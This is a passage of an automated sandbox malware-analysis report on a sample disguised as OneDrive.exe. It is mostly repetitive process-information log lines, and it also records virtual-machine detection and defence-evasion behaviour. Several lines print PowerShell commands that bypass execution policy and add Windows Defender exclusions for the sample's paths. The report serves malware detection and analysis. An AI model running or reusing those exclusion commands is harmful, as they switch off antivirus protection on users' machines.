              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\OneDrive.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\OneDrive.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\OneDrive.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeMemory allocated: 1AF90000 memory reserve | memory write watchJump to behavior
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 1B080000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: D50000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 1AB00000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 2790000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 1A920000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 14D0000 memory reserve | memory write watch
              Source: C:\ProgramData\OneDrive.exeMemory allocated: 1AF90000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\OneDrive.exeWindow / User API: threadDelayed 9761Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5001Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4844Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6855Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2874Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7357Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2154Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5999
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3517
              Source: C:\Users\user\Desktop\OneDrive.exe TID: 2844Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 6855 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396Thread sleep count: 2874 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 5999 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 3517 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\ProgramData\OneDrive.exe TID: 1616Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\OneDrive.exe TID: 2876Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\OneDrive.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
              Source: C:\ProgramData\OneDrive.exe TID: 4864Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\ProgramData\OneDrive.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\ProgramData\OneDrive.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\ProgramData\OneDrive.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\ProgramData\OneDrive.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\Desktop\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\ProgramData\OneDrive.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791\gdiplus.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_919e9136cc8d4791Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior
              Source: OneDrive.exe, 00000000.00000002.2627304536.000000001BC90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
              Source: OneDrive.exe, 00000000.00000002.2580493649.0000000001160000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\OneDrive.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\ProgramData\OneDrive.exeProcess token adjusted: Debug
              Source: C:\ProgramData\OneDrive.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\OneDrive.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDrive.exe'Jump to behavior
              Source: C:\Users\user\Desktop\OneDrive.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'Jump to behavior
              Bypasses PowerShell execution policy
